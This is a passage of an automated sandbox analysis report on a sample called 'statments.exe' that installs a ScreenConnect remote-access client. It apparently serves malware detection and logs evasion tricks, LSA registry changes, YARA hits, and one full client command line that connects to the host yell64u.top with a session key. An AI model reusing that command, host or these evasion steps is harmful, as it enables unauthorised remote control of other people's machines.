                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677160184.0000000000F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677294239.0000000000FC2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: statments.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                              Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                              Source: C:\Users\user\Desktop\statments.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 1180000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 2BF0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 4BF0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 6590000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 5BB0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 7590000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 5D00000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 7590000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: 8590000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: CF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: 13F0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Memory allocated: 1300000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: FC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 1AAF0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: C40000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Memory allocated: 1A790000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\statments.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.Cab.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3F66.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe
                              Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll
                              Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3C77.tmp
                              Source: C:\Users\user\Desktop\statments.exe TID: 4248 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 5912 Thread sleep count: 78 > 30
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 4472 Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\statments.exe Thread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                              Source: 4d36da.msi.3.dr Binary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2788582593.000000000084F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\statments.exe Process token adjusted: Debug
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\statments.exe Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: 1.0.statments.exe.9578f8.1.raw.unpack, Program.cs; Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.cs; Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.cs; Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\statments.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknown; Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=java&c=&c=it&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr; Binary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr; Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\Desktop\statments.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\msiexec.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformation
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe; Code function: 10_2_00007FFB4A8B3642 CreateNamedPipeW,10_2_00007FFB4A8B3642
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe; Code function: 8_2_00CF4D2E RtlGetVersion,8_2_00CF4D2E
                              Source: C:\Users\user\Desktop\statments.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              Source: C:\Windows\System32\msiexec.exe; Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                              Source: Yara match; File source: statments.exe, type: SAMPLE
                              Source: Yara match; File source: 1.2.statments.exe.5740000.10.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 10.0.ScreenConnect.WindowsClient.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 10.2.ScreenConnect.WindowsClient.exe.2b6fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 1.0.statments.exe.4d5db8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 1.2.statments.exe.5740000.10.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 1.0.statments.exe.4ac3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 1.0.statments.exe.410000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 11.2.ScreenConnect.WindowsClient.exe.280fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 1.0.statments.exe.4263d8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000001.00000002.1549465731.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: statments.exe PID: 2564, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 2288, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6792, type: MEMORYSTR
                              Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3836, type: MEMORYSTR
                              Source: Yara match; File source: C:\Config.Msi\4d36d9.rbs, type: DROPPED
                              Source: Yara match; File source: C:\Windows\Installer\MSI3C18.tmp, type: DROPPED
                              Source: Yara match; File source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              [MITRE ATT&CK matrix. Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
                              [Behavior graph. Behavior Graph ID: 1536325, Sample: statments.exe, Startdate: 17/10/2024, Architecture: WINDOWS, Score: 42]

                              No Antivirus matches
                              Source | Detection | Scanner | Label | Link
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe | 0% | ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | 0% | ReversingLabs
